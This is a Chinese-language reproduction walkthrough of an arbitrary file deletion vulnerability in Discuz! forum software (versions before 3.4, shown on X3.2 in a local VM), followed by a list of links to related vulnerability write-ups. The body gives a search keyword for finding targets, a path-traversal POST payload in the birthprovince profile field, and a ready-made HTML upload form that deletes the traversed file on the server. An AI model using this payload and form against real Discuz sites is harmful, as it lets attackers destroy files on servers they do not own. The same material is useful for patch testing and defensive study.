Discuz<3.4任意文件删除漏洞
这里以Discuz3.2为例
关键字:
Powered by Discuz! X3.2
时间有限,就不一一截图了,Discuz所有页面全在Discuz_X3.2_SC_UTF8/upload/目录下
利用过程:
访问http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/robots.txt试试,这是我虚机中discuz中robots的路径,具体视个人情况而定
1、注册个帐号
2、提交数据
url地址栏:http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/home.php?mod=spacecp&ac=profile&op=base
POST数据:birthprovince=../../../robots.txt&profilesubmit=1&formhash=2bc7eb9a,这个formhash的值可以从源代码中找到,每次都不一样的
3、提交数据之后,打开设置界面,可以看到出生地变成../../../robots.txt
4、构造上传表单
<form action="http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/home.php?mod=spacecp&ac=profile&op=base" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="2bc7eb9a" /> //此formhash值和第三布formhash值一样
<input type="text" name="profilesubmit" value="1" />
<input type="submit" value="submit" />
</form>
上传成功后,返回空白页面,然后访问http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/robots.txt,发现robots.txt已被删除
- Discuz!X 3.4 前台任意文件删除漏洞复现
- Discuz<=3.4任意文件删除漏洞
- Discuz!X 3.4 任意文件删除漏洞复现过程(附python脚本)
- Discuz!X 前台任意文件删除漏洞复现测试
- Discuz全版本任意文件删除漏洞
- DEDECMS 会员任意删除文件漏洞
- 动易网站管理系统删除任意文件漏洞
- Youke365_2_4 一处Sql注入漏洞以及一处任意文件删除
- Ewebeditor2.8.0最终版删除任意文件漏洞
- phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞
- [代码审计]XiaoCms(后台任意文件上传至getshell,任意目录删除,会话固定漏洞)
- Youke365_2_4 一处Sql注入漏洞以及一处任意文件删除
- 百度搜霸工具条出现下载任意文件执行漏洞 含攻击代码
- PHP任意文件上传漏洞CVE-2015-2348浅析
- git 漏洞导致任意文件读取
- PHPMailer任意文件读取漏洞分析(CVE-2017-5223)
- PHP任意文件上传漏洞
- 告诉大家一个无敌删除命令,任意无法删除的文件都能删除
- TEC-004-php文件下载任意文件读取漏洞修复
- ASP.NET惊爆新安全漏洞 攻击者可访问任意文件